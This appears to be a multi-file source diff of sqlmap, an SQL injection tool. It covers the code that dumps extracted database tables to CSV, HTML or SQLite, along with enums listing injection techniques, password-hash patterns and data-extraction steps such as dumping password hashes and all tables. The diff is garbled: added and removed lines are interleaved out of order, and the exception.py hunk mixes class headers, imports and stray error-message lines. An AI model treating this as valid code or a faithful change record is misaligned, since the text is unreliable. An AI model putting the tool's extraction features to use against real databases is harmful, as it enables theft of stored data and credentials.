        elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML):
            if not os.path.isdir(dumpDbPath):
                try:
                    os.makedirs(dumpDbPath, 0755)
                except:
                    warnFile = True
                    _ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(db)))
                    dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % (_, hashlib.md5(unicodeencode(db)).hexdigest()[:8]))
                    if not os.path.isdir(dumpDbPath):
                        try:
                            os.makedirs(dumpDbPath, 0755)
                        except Exception, ex:
                            try:
                                tempDir = tempfile.mkdtemp(prefix="sqlmapdb")
                            except IOError, _:
                                errMsg = "unable to write to the temporary directory ('%s'). " % _
                                errMsg += "Please make sure that your disk is not full and "
                                errMsg += "that you have sufficient write permissions to "
                                errMsg += "create temporary files and/or directories"
                                raise SqlmapSystemException(errMsg)
-            dumpFileName = "%s%s%s.csv" % (dumpDbPath, os.sep, table)
+                            warnMsg = "unable to create dump directory "
-            dumpFP = open(dumpFileName, "w")
+                            warnMsg += "'%s' (%s). " % (dumpDbPath, getSafeExString(ex))
                            warnMsg += "Using temporary directory '%s' instead" % tempDir
                            logger.warn(warnMsg)
                            dumpDbPath = tempDir
            dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower()))
            if not checkFile(dumpFileName, False):
                try:
                    openFile(dumpFileName, "w+b").close()
                except SqlmapSystemException:
                    raise
                except:
                    warnFile = True
                    _ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(table)))
                    if len(_) < len(table) or IS_WIN and table.upper() in WINDOWS_RESERVED_NAMES:
                        _ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(table)))
                        dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(unicodeencode(table)).hexdigest()[:8], conf.dumpFormat.lower()))
                    else:
                        dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower()))
            appendToFile = any((conf.limitStart, conf.limitStop)) and checkFile(dumpFileName, False)
            dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab", buffering=DUMP_FILE_BUFFER_SIZE)
        count = int(tableValues["__infos__"]["count"])
-        separator = ""
+        separator = str()
        field = 1
        fields = len(tableValues) - 1
-        columns = tableValues.keys()
+        columns = prioritySortColumns(tableValues.keys())
-        columns.sort(key=lambda x: x.lower())
+
        if conf.col:
            cols = conf.col.split(',')
            columns = sorted(columns, key=lambda _: cols.index(_) if _ in cols else 0)
        for column in columns:
            if column != "__infos__":
@@ -243,67 +471,220 @@ class Dump:
                separator += "+%s" % lines
        separator += "+"
-        self.__write("Database: %s\nTable: %s" % (db, table))
+        self._write("Database: %s\nTable: %s" % (unsafeSQLIdentificatorNaming(db) if db else "Current database", unsafeSQLIdentificatorNaming(table)))
        if conf.dumpFormat == DUMP_FORMAT.SQLITE:
            cols = []
            for column in columns:
                if column != "__infos__":
                    colType = Replication.INTEGER
                    for value in tableValues[column]['values']:
                        try:
                            if not value or value == " ":  # NULL
                                continue
                            int(value)
                        except ValueError:
                            colType = None
                            break
                    if colType is None:
                        colType = Replication.REAL
                        for value in tableValues[column]['values']:
                            try:
                                if not value or value == " ":  # NULL
                                    continue
                                float(value)
                            except ValueError:
                                colType = None
                                break
                    cols.append((unsafeSQLIdentificatorNaming(column), colType if colType else Replication.TEXT))
            rtable = replication.createTable(table, cols)
        elif conf.dumpFormat == DUMP_FORMAT.HTML:
            dataToDumpFile(dumpFP, "<!DOCTYPE html>\n<html>\n<head>\n")
            dataToDumpFile(dumpFP, "<meta http-equiv=\"Content-type\" content=\"text/html;charset=%s\">\n" % UNICODE_ENCODING)
            dataToDumpFile(dumpFP, "<title>%s</title>\n" % ("%s%s" % ("%s." % db if METADB_SUFFIX not in db else "", table)))
            dataToDumpFile(dumpFP, HTML_DUMP_CSS_STYLE)
            dataToDumpFile(dumpFP, "\n</head>\n<body>\n<table>\n<thead>\n<tr>\n")
        if count == 1:
-            self.__write("[1 entry]")
+            self._write("[1 entry]")
        else:
-            self.__write("[%d entries]" % count)
+            self._write("[%d entries]" % count)
-        self.__write(separator)
+        self._write(separator)
        for column in columns:
            if column != "__infos__":
                info = tableValues[column]
                column = unsafeSQLIdentificatorNaming(column)
                maxlength = int(info["length"])
                blank = " " * (maxlength - len(column))
                self.__write("| %s%s" % (column, blank), n=False)
-                if not conf.multipleTargets and field == fields:
+                self._write("| %s%s" % (column, blank), newline=False)
-                    dataToDumpFile(dumpFP, "\"%s\"" % column)
+
                if not appendToFile:
                    if conf.dumpFormat == DUMP_FORMAT.CSV:
                        if field == fields:
                            dataToDumpFile(dumpFP, "%s" % safeCSValue(column))
                        else:
-                    dataToDumpFile(dumpFP, "\"%s\"," % column)
+                            dataToDumpFile(dumpFP, "%s%s" % (safeCSValue(column), conf.csvDel))
                    elif conf.dumpFormat == DUMP_FORMAT.HTML:
                        dataToDumpFile(dumpFP, "<th>%s</th>" % cgi.escape(column).encode("ascii", "xmlcharrefreplace"))
                field += 1
-        self.__write("|\n%s" % separator)
+        if conf.dumpFormat == DUMP_FORMAT.HTML:
-        if not conf.multipleTargets:
+            dataToDumpFile(dumpFP, "\n</tr>\n</thead>\n<tbody>\n")
            dataToDumpFile(dumpFP, "\n")
-        for i in range(count):
+        self._write("|\n%s" % separator)
        if conf.dumpFormat == DUMP_FORMAT.CSV:
            dataToDumpFile(dumpFP, "\n" if not appendToFile else "")
        elif conf.dumpFormat == DUMP_FORMAT.SQLITE:
            rtable.beginTransaction()
        if count > TRIM_STDOUT_DUMP_SIZE:
            warnMsg = "console output will be trimmed to "
            warnMsg += "last %d rows due to " % TRIM_STDOUT_DUMP_SIZE
            warnMsg += "large table size"
            logger.warning(warnMsg)
        for i in xrange(count):
            console = (i >= count - TRIM_STDOUT_DUMP_SIZE)
            field = 1
            values = []
            if conf.dumpFormat == DUMP_FORMAT.HTML:
                dataToDumpFile(dumpFP, "<tr>")
            for column in columns:
                if column != "__infos__":
                    info = tableValues[column]
                    value = info["values"][i]
-                    if re.search("^[\ *]*$", value):
+                    if len(info["values"]) <= i:
-                        value = "NULL"
+                        continue
                    if info["values"][i] is None:
                        value = u''
                    else:
                        value = getUnicode(info["values"][i])
                        value = DUMP_REPLACEMENTS.get(value, value)
                    values.append(value)
                    maxlength = int(info["length"])
                    blank = " " * (maxlength - len(value))
-                    self.__write("| %s%s" % (value, blank), n=False)
+                    self._write("| %s%s" % (value, blank), newline=False, console=console)
                    if len(value) > MIN_BINARY_DISK_DUMP_SIZE and r'\x' in value:
                        try:
                            mimetype = magic.from_buffer(value, mime=True)
                            if any(mimetype.startswith(_) for _ in ("application", "image")):
                                if not os.path.isdir(dumpDbPath):
                                    os.makedirs(dumpDbPath, 0755)
                                _ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(column)))
                                filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (_, randomInt(8)))
                                warnMsg = "writing binary ('%s') content to file '%s' " % (mimetype, filepath)
                                logger.warn(warnMsg)
                                with open(filepath, "wb") as f:
                                    _ = safechardecode(value, True)
                                    f.write(_)
                        except magic.MagicException, err:
                            logger.debug(str(err))
                    if conf.dumpFormat == DUMP_FORMAT.CSV:
                        if field == fields:
-                        dataToDumpFile(dumpFP, "\"%s\"" % value)
+                            dataToDumpFile(dumpFP, "%s" % safeCSValue(value))
                        else:
-                        dataToDumpFile(dumpFP, "\"%s\"," % value)
+                            dataToDumpFile(dumpFP, "%s%s" % (safeCSValue(value), conf.csvDel))
                    elif conf.dumpFormat == DUMP_FORMAT.HTML:
                        dataToDumpFile(dumpFP, "<td>%s</td>" % cgi.escape(value).encode("ascii", "xmlcharrefreplace"))
                    field += 1
-            self.__write("|")
+            if conf.dumpFormat == DUMP_FORMAT.SQLITE:
-            if not conf.multipleTargets:
+                try:
                    rtable.insert(values)
                except SqlmapValueException:
                    pass
            elif conf.dumpFormat == DUMP_FORMAT.CSV:
                dataToDumpFile(dumpFP, "\n")
            elif conf.dumpFormat == DUMP_FORMAT.HTML:
                dataToDumpFile(dumpFP, "</tr>\n")
-        self.__write("%s\n" % separator)
+            self._write("|", console=console)
-        if not conf.multipleTargets:
+        self._write("%s\n" % separator)
        if conf.dumpFormat == DUMP_FORMAT.SQLITE:
            rtable.endTransaction()
            logger.info("table '%s.%s' dumped to sqlite3 database '%s'" % (db, table, replication.dbpath))
        elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML):
            if conf.dumpFormat == DUMP_FORMAT.HTML:
                dataToDumpFile(dumpFP, "</tbody>\n</table>\n</body>\n</html>")
            else:
                dataToDumpFile(dumpFP, "\n")
            dumpFP.close()
-            logger.info("Table '%s.%s' dumped to CSV file '%s'" % (db, table, dumpFileName))
+            msg = "table '%s.%s' dumped to %s file '%s'" % (db, table, conf.dumpFormat, dumpFileName)
            if not warnFile:
                logger.info(msg)
            else:
                logger.warn(msg)
    def dbColumns(self, dbColumnsDict, colConsider, dbs):
        if hasattr(conf, "api"):
            self._write(dbColumnsDict, content_type=CONTENT_TYPE.COLUMNS)
            return
        for column in dbColumnsDict.keys():
            if colConsider == "1":
                colConsiderStr = "s LIKE '%s' were" % unsafeSQLIdentificatorNaming(column)
            else:
                colConsiderStr = " '%s' was" % unsafeSQLIdentificatorNaming(column)
            msg = "column%s found in the " % colConsiderStr
            msg += "following databases:"
            self._write(msg)
            _ = {}
            for db, tblData in dbs.items():
                for tbl, colData in tblData.items():
                    for col, dataType in colData.items():
                        if column.lower() in col.lower():
                            if db in _:
                                if tbl in _[db]:
                                    _[db][tbl][col] = dataType
                                else:
                                    _[db][tbl] = {col: dataType}
                            else:
                                _[db] = {}
                                _[db][tbl] = {col: dataType}
                            continue
            self.dbTableColumns(_)
    def query(self, query, queryRes):
        self.string(query, queryRes, content_type=CONTENT_TYPE.SQL_QUERY)
    def rFile(self, fileData):
        self.lister("files saved to", fileData, sort=False, content_type=CONTENT_TYPE.FILE_READ)
    def registerValue(self, registerData):
        self.string("Registry key value data", registerData, content_type=CONTENT_TYPE.REG_READ, sort=False)
 # object to manage how to print the retrieved queries output to
 # standard output and sessions file
--- a/lib/core/enums.py
+++ b/lib/core/enums.py
@@ -0,0 +1,366 @@
 #!/usr/bin/env python
 """
 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 class PRIORITY:
    LOWEST = -100
    LOWER = -50
    LOW = -10
    NORMAL = 0
    HIGH = 10
    HIGHER = 50
    HIGHEST = 100
 class SORT_ORDER:
    FIRST = 0
    SECOND = 1
    THIRD = 2
    FOURTH = 3
    FIFTH = 4
    LAST = 100
 class DBMS:
    ACCESS = "Microsoft Access"
    DB2 = "IBM DB2"
    FIREBIRD = "Firebird"
    MAXDB = "SAP MaxDB"
    MSSQL = "Microsoft SQL Server"
    MYSQL = "MySQL"
    ORACLE = "Oracle"
    PGSQL = "PostgreSQL"
    SQLITE = "SQLite"
    SYBASE = "Sybase"
    HSQLDB = "HSQLDB"
 class DBMS_DIRECTORY_NAME:
    ACCESS = "access"
    DB2 = "db2"
    FIREBIRD = "firebird"
    MAXDB = "maxdb"
    MSSQL = "mssqlserver"
    MYSQL = "mysql"
    ORACLE = "oracle"
    PGSQL = "postgresql"
    SQLITE = "sqlite"
    SYBASE = "sybase"
    HSQLDB = "hsqldb"
 class CUSTOM_LOGGING:
    PAYLOAD = 9
    TRAFFIC_OUT = 8
    TRAFFIC_IN = 7
 class OS:
    LINUX = "Linux"
    WINDOWS = "Windows"
 class PLACE:
    GET = "GET"
    POST = "POST"
    URI = "URI"
    COOKIE = "Cookie"
    USER_AGENT = "User-Agent"
    REFERER = "Referer"
    HOST = "Host"
    CUSTOM_POST = "(custom) POST"
    CUSTOM_HEADER = "(custom) HEADER"
 class POST_HINT:
    SOAP = "SOAP"
    JSON = "JSON"
    JSON_LIKE = "JSON-like"
    MULTIPART = "MULTIPART"
    XML = "XML (generic)"
    ARRAY_LIKE = "Array-like"
 class HTTPMETHOD:
    GET = "GET"
    POST = "POST"
    HEAD = "HEAD"
    PUT = "PUT"
    DELETE = "DELETE"
    TRACE = "TRACE"
    OPTIONS = "OPTIONS"
    CONNECT = "CONNECT"
    PATCH = "PATCH"
 class NULLCONNECTION:
    HEAD = "HEAD"
    RANGE = "Range"
    SKIP_READ = "skip-read"
 class REFLECTIVE_COUNTER:
    MISS = "MISS"
    HIT = "HIT"
 class CHARSET_TYPE:
    BINARY = 1
    DIGITS = 2
    HEXADECIMAL = 3
    ALPHA = 4
    ALPHANUM = 5
 class HEURISTIC_TEST:
    CASTED = 1
    NEGATIVE = 2
    POSITIVE = 3
 class HASH:
    MYSQL = r'(?i)\A\*[0-9a-f]{40}\Z'
    MYSQL_OLD = r'(?i)\A(?![0-9]+\Z)[0-9a-f]{16}\Z'
    POSTGRES = r'(?i)\Amd5[0-9a-f]{32}\Z'
    MSSQL = r'(?i)\A0x0100[0-9a-f]{8}[0-9a-f]{40}\Z'
    MSSQL_OLD = r'(?i)\A0x0100[0-9a-f]{8}[0-9a-f]{80}\Z'
    MSSQL_NEW = r'(?i)\A0x0200[0-9a-f]{8}[0-9a-f]{128}\Z'
    ORACLE = r'(?i)\As:[0-9a-f]{60}\Z'
    ORACLE_OLD = r'(?i)\A[01-9a-f]{16}\Z'
    MD5_GENERIC = r'(?i)\A[0-9a-f]{32}\Z'
    SHA1_GENERIC = r'(?i)\A[0-9a-f]{40}\Z'
    SHA224_GENERIC = r'(?i)\A[0-9a-f]{28}\Z'
    SHA384_GENERIC = r'(?i)\A[0-9a-f]{48}\Z'
    SHA512_GENERIC = r'(?i)\A[0-9a-f]{64}\Z'
    CRYPT_GENERIC = r'(?i)\A(?!\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\Z)(?![0-9]+\Z)[./0-9A-Za-z]{13}\Z'
    WORDPRESS = r'(?i)\A\$P\$[./0-9A-Za-z]{31}\Z'
 # Reference: http://www.zytrax.com/tech/web/mobile_ids.html
 class MOBILES:
    BLACKBERRY = ("BlackBerry 9900", "Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+")
    GALAXY = ("Samsung Galaxy S", "Mozilla/5.0 (Linux; U; Android 2.2; en-US; SGH-T959D Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1")
    HP = ("HP iPAQ 6365", "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320; HP iPAQ h6300)")
    HTC = ("HTC Sensation", "Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30")
    IPHONE = ("Apple iPhone 4s", "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B179 Safari/7534.48.3")
    NEXUS = ("Google Nexus 7", "Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Safari/535.19")
    NOKIA = ("Nokia N97", "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344")
 class PROXY_TYPE:
    HTTP = "HTTP"
    HTTPS = "HTTPS"
    SOCKS4 = "SOCKS4"
    SOCKS5 = "SOCKS5"
 class REGISTRY_OPERATION:
    READ = "read"
    ADD = "add"
    DELETE = "delete"
 class DUMP_FORMAT:
    CSV = "CSV"
    HTML = "HTML"
    SQLITE = "SQLITE"
 class HTTP_HEADER:
    ACCEPT = "Accept"
    ACCEPT_CHARSET = "Accept-Charset"
    ACCEPT_ENCODING = "Accept-Encoding"
    ACCEPT_LANGUAGE = "Accept-Language"
    AUTHORIZATION = "Authorization"
    CACHE_CONTROL = "Cache-Control"
    CONNECTION = "Connection"
    CONTENT_ENCODING = "Content-Encoding"
    CONTENT_LENGTH = "Content-Length"
    CONTENT_RANGE = "Content-Range"
    CONTENT_TYPE = "Content-Type"
    COOKIE = "Cookie"
    EXPIRES = "Expires"
    HOST = "Host"
    IF_MODIFIED_SINCE = "If-Modified-Since"
    LAST_MODIFIED = "Last-Modified"
    LOCATION = "Location"
    PRAGMA = "Pragma"
    PROXY_AUTHORIZATION = "Proxy-Authorization"
    PROXY_CONNECTION = "Proxy-Connection"
    RANGE = "Range"
    REFERER = "Referer"
    SERVER = "Server"
    SET_COOKIE = "Set-Cookie"
    TRANSFER_ENCODING = "Transfer-Encoding"
    URI = "URI"
    USER_AGENT = "User-Agent"
    VIA = "Via"
    X_POWERED_BY = "X-Powered-By"
 class EXPECTED:
    BOOL = "bool"
    INT = "int"
 class OPTION_TYPE:
    BOOLEAN = "boolean"
    INTEGER = "integer"
    FLOAT = "float"
    STRING = "string"
 class HASHDB_KEYS:
    DBMS = "DBMS"
    DBMS_FORK = "DBMS_FORK"
    CHECK_WAF_RESULT = "CHECK_WAF_RESULT"
    CONF_TMP_PATH = "CONF_TMP_PATH"
    KB_ABS_FILE_PATHS = "KB_ABS_FILE_PATHS"
    KB_BRUTE_COLUMNS = "KB_BRUTE_COLUMNS"
    KB_BRUTE_TABLES = "KB_BRUTE_TABLES"
    KB_CHARS = "KB_CHARS"
    KB_DYNAMIC_MARKINGS = "KB_DYNAMIC_MARKINGS"
    KB_INJECTIONS = "KB_INJECTIONS"
    KB_ERROR_CHUNK_LENGTH = "KB_ERROR_CHUNK_LENGTH"
    KB_XP_CMDSHELL_AVAILABLE = "KB_XP_CMDSHELL_AVAILABLE"
    OS = "OS"
 class REDIRECTION:
    YES = "Y"
    NO = "N"
 class PAYLOAD:
    SQLINJECTION = {
                        1: "boolean-based blind",
                        2: "error-based",
                        3: "inline query",
                        4: "stacked queries",
                        5: "AND/OR time-based blind",
                        6: "UNION query",
                   }
    PARAMETER = {
                    1: "Unescaped numeric",
                    2: "Single quoted string",
                    3: "LIKE single quoted string",
                    4: "Double quoted string",
                    5: "LIKE double quoted string",
                }
    RISK = {
                0: "No risk",
                1: "Low risk",
                2: "Medium risk",
                3: "High risk",
           }
    CLAUSE = {
                0: "Always",
                1: "WHERE",
                2: "GROUP BY",
                3: "ORDER BY",
                4: "LIMIT",
                5: "OFFSET",
                6: "TOP",
                7: "Table name",
                8: "Column name",
             }
    class METHOD:
        COMPARISON = "comparison"
        GREP = "grep"
        TIME = "time"
        UNION = "union"
    class TECHNIQUE:
        BOOLEAN = 1
        ERROR = 2
        QUERY = 3
        STACKED = 4
        TIME = 5
        UNION = 6
    class WHERE:
        ORIGINAL = 1
        NEGATIVE = 2
        REPLACE = 3
 class WIZARD:
    BASIC = ("getBanner", "getCurrentUser", "getCurrentDb", "isDba")
    INTERMEDIATE = ("getBanner", "getCurrentUser", "getCurrentDb", "isDba", "getUsers", "getDbs", "getTables", "getSchema", "excludeSysDbs")
    ALL = ("getBanner", "getCurrentUser", "getCurrentDb", "isDba", "getHostname", "getUsers", "getPasswordHashes", "getPrivileges", "getRoles", "dumpAll")
 class ADJUST_TIME_DELAY:
    DISABLE = -1
    NO = 0
    YES = 1
 class WEB_API:
    PHP = "php"
    ASP = "asp"
    ASPX = "aspx"
    JSP = "jsp"
 class CONTENT_TYPE:
    TECHNIQUES = 0
    DBMS_FINGERPRINT = 1
    BANNER = 2
    CURRENT_USER = 3
    CURRENT_DB = 4
    HOSTNAME = 5
    IS_DBA = 6
    USERS = 7
    PASSWORDS = 8
    PRIVILEGES = 9
    ROLES = 10
    DBS = 11
    TABLES = 12
    COLUMNS = 13
    SCHEMA = 14
    COUNT = 15
    DUMP_TABLE = 16
    SEARCH = 17
    SQL_QUERY = 18
    COMMON_TABLES = 19
    COMMON_COLUMNS = 20
    FILE_READ = 21
    FILE_WRITE = 22
    OS_CMD = 23
    REG_READ = 24
 PART_RUN_CONTENT_TYPES = {
    "checkDbms": CONTENT_TYPE.TECHNIQUES,
    "getFingerprint": CONTENT_TYPE.DBMS_FINGERPRINT,
    "getBanner": CONTENT_TYPE.BANNER,
    "getCurrentUser": CONTENT_TYPE.CURRENT_USER,
    "getCurrentDb": CONTENT_TYPE.CURRENT_DB,
    "getHostname": CONTENT_TYPE.HOSTNAME,
    "isDba": CONTENT_TYPE.IS_DBA,
    "getUsers": CONTENT_TYPE.USERS,
    "getPasswordHashes": CONTENT_TYPE.PASSWORDS,
    "getPrivileges": CONTENT_TYPE.PRIVILEGES,
    "getRoles": CONTENT_TYPE.ROLES,
    "getDbs": CONTENT_TYPE.DBS,
    "getTables": CONTENT_TYPE.TABLES,
    "getColumns": CONTENT_TYPE.COLUMNS,
    "getSchema": CONTENT_TYPE.SCHEMA,
    "getCount": CONTENT_TYPE.COUNT,
    "dumpTable": CONTENT_TYPE.DUMP_TABLE,
    "search": CONTENT_TYPE.SEARCH,
    "sqlQuery": CONTENT_TYPE.SQL_QUERY,
    "tableExists": CONTENT_TYPE.COMMON_TABLES,
    "columnExists": CONTENT_TYPE.COMMON_COLUMNS,
    "readFile": CONTENT_TYPE.FILE_READ,
    "writeFile": CONTENT_TYPE.FILE_WRITE,
    "osCmd": CONTENT_TYPE.OS_CMD,
    "regRead": CONTENT_TYPE.REG_READ
 }
 class CONTENT_STATUS:
    IN_PROGRESS = 0
    COMPLETE = 1
 class AUTH_TYPE:
    BASIC = "basic"
    DIGEST = "digest"
    NTLM = "ntlm"
    PKI = "pki"
 class AUTOCOMPLETE_TYPE:
    SQL = 0
    OS = 1
    SQLMAP = 2
 class NOTE:
    FALSE_POSITIVE_OR_UNEXPLOITABLE = "false positive or unexploitable"
 class MKSTEMP_PREFIX:
    HASHES = "sqlmaphashes-"
    CRAWLER = "sqlmapcrawler-"
    IPC = "sqlmapipc-"
    TESTING = "sqlmaptesting-"
    RESULTS = "sqlmapresults-"
    COOKIE_JAR = "sqlmapcookiejar-"
    BIG_ARRAY = "sqlmapbigarray-"
--- a/lib/core/exception.py
+++ b/lib/core/exception.py
@@ -1,119 +1,75 @@
 #!/usr/bin/env python
 """
-$Id$
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
-
+See the file 'doc/COPYING' for copying permission
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
                        and Daniele Bellucci <daniele.bellucci@gmail.com>
 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 Software Foundation version 2 of the License.
 sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
 WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
 FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
 details.
 You should have received a copy of the GNU General Public License along
 with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
-
+class SqlmapBaseException(Exception):
 import sys
 from lib.core.settings import VERSION
 from lib.core.settings import VERSION_STRING
 class sqlmapConnectionException(Exception):
    pass
-
+class SqlmapCompressionException(SqlmapBaseException):
 class sqlmapDataException(Exception):
    pass
-
+class SqlmapConnectionException(SqlmapBaseException):
 class sqlmapFilePathException(Exception):
    pass
-
+class SqlmapDataException(SqlmapBaseException):
 class sqlmapGenericException(Exception):
    pass
-
+class SqlmapFilePathException(SqlmapBaseException):
 class sqlmapMissingMandatoryOptionException(Exception):
    pass
-
+class SqlmapGenericException(SqlmapBaseException):
 class sqlmapNoneDataException(Exception):
    pass
-
+class SqlmapInstallationException(SqlmapBaseException):
 class sqlmapRegExprException(Exception):
    pass
-
+class SqlmapMissingDependence(SqlmapBaseException):
 class sqlmapSyntaxException(Exception):
    pass
-
+class SqlmapMissingMandatoryOptionException(SqlmapBaseException):
 class sqlmapUndefinedMethod(Exception):
    pass
-
+class SqlmapMissingPrivileges(SqlmapBaseException):
 class sqlmapMissingPrivileges(Exception):
    pass
-
+class SqlmapNoneDataException(SqlmapBaseException):
 class sqlmapNotVulnerableException(Exception):
    pass
-
+class SqlmapNotVulnerableException(SqlmapBaseException):
 class sqlmapThreadException(Exception):
    pass
-
+class SqlmapSilentQuitException(SqlmapBaseException):
 class sqlmapUnsupportedDBMSException(Exception):
    pass
-
+class SqlmapUserQuitException(SqlmapBaseException):
 class sqlmapUnsupportedFeatureException(Exception):
    pass
-
+class SqlmapShellQuitException(SqlmapBaseException):
 class sqlmapValueException(Exception):
    pass
 class SqlmapSyntaxException(SqlmapBaseException):
    pass
-def unhandledException():
+class SqlmapSystemException(SqlmapBaseException):
-    errMsg  = "unhandled exception in %s, please copy " % VERSION_STRING
+    pass
    errMsg += "the command line and the following text and send by e-mail "
    errMsg += "to sqlmap-users@lists.sourceforge.net. The developers will "
    errMsg += "fix it as soon as possible:\nsqlmap version: %s\n" % VERSION
    errMsg += "Python version: %s\n" % sys.version.split()[0]
    errMsg += "Operating system: %s" % sys.platform
    return errMsg
 class SqlmapThreadException(SqlmapBaseException):
    pass
-exceptionsTuple = (
+class SqlmapTokenException(SqlmapBaseException):
-                    sqlmapConnectionException,
+    pass
-                    sqlmapDataException,
+
-                    sqlmapFilePathException,
+class SqlmapUndefinedMethod(SqlmapBaseException):
-                    sqlmapGenericException,
+    pass
-                    sqlmapMissingMandatoryOptionException,
+
-                    sqlmapNoneDataException,
+class SqlmapUnsupportedDBMSException(SqlmapBaseException):
-                    sqlmapRegExprException,
+    pass
-                    sqlmapSyntaxException,
+
-                    sqlmapUndefinedMethod,
+class SqlmapUnsupportedFeatureException(SqlmapBaseException):
-                    sqlmapMissingPrivileges,
+    pass
-                    sqlmapNotVulnerableException,
+
-                    sqlmapThreadException,
+class SqlmapValueException(SqlmapBaseException):
-                    sqlmapUnsupportedDBMSException,
+    pass
                    sqlmapUnsupportedFeatureException,
                    sqlmapValueException,
                  )
--- a/lib/core/log.py
+++ b/lib/core/log.py
@@ -0,0 +1,44 @@
 #!/usr/bin/env python
 """
 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 import logging
 import sys
 from lib.core.enums import CUSTOM_LOGGING
 logging.addLevelName(CUSTOM_LOGGING.PAYLOAD, "PAYLOAD")
 logging.addLevelName(CUSTOM_LOGGING.TRAFFIC_OUT, "TRAFFIC OUT")
 logging.addLevelName(CUSTOM_LOGGING.TRAFFIC_IN, "TRAFFIC IN")
 LOGGER = logging.getLogger("sqlmapLog")
 LOGGER_HANDLER = None
 try:
    from thirdparty.ansistrm.ansistrm import ColorizingStreamHandler
    disableColor = False
    for argument in sys.argv:
        if "disable-col" in argument:
            disableColor = True
            break
    if disableColor:
        LOGGER_HANDLER = logging.StreamHandler(sys.stdout)
    else:
        LOGGER_HANDLER = ColorizingStreamHandler(sys.stdout)
        LOGGER_HANDLER.level_map[logging.getLevelName("PAYLOAD")] = (None, "cyan", False)
        LOGGER_HANDLER.level_map[logging.getLevelName("TRAFFIC OUT")] = (None, "magenta", False)
        LOGGER_HANDLER.level_map[logging.getLevelName("TRAFFIC IN")] = ("magenta", None, False)
 except ImportError:
    LOGGER_HANDLER = logging.StreamHandler(sys.stdout)
 FORMATTER = logging.Formatter("\r[%(asctime)s] [%(levelname)s] %(message)s", "%H:%M:%S")
 LOGGER_HANDLER.setFormatter(FORMATTER)
 LOGGER.addHandler(LOGGER_HANDLER)
 LOGGER.setLevel(logging.INFO)
--- a/lib/core/option.py
+++ b/lib/core/option.py
--- a/lib/core/optiondict.py
+++ b/lib/core/optiondict.py
@@ -1,69 +1,111 @@
 #!/usr/bin/env python
 """
-$Id$
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
-
+See the file 'doc/COPYING' for copying permission
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
                        and Daniele Bellucci <daniele.bellucci@gmail.com>
 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 Software Foundation version 2 of the License.
 sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
 WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
 FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
 details.
 You should have received a copy of the GNU General Public License along
 with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 optDict = {
-            # Family:        { "parameter_name":    "parameter_datatype" },
+            # Format:
            # Family:        { "parameter name":    "parameter datatype" },
            # Or:
            # Family:        { "parameter name":    ("parameter datatype", "category name used for common outputs feature") },
            "Target":        {
                               "direct":            "string",
                               "url":               "string",
-                               "list":              "string",
+                               "logFile":           "string",
                               "bulkFile":          "string",
                               "requestFile":       "string",
                               "sessionFile":       "string",
                               "googleDork":        "string",
                               "configFile":        "string",
                               "sitemapUrl":        "string",
                             },
            "Request":       {
                               "method":            "string",
                               "data":              "string",
                               "paramDel":          "string",
                               "cookie":            "string",
-                               "referer":           "string",
+                               "cookieDel":         "string",
                               "loadCookies":       "string",
                               "dropSetCookie":     "boolean",
                               "agent":             "string",
-                               "userAgentsFile":    "string",
+                               "randomAgent":       "boolean",
                               "host":              "string",
                               "referer":           "string",
                               "headers":           "string",
-                               "aType":             "string",
+                               "authType":          "string",
-                               "aCred":             "string",
+                               "authCred":          "string",
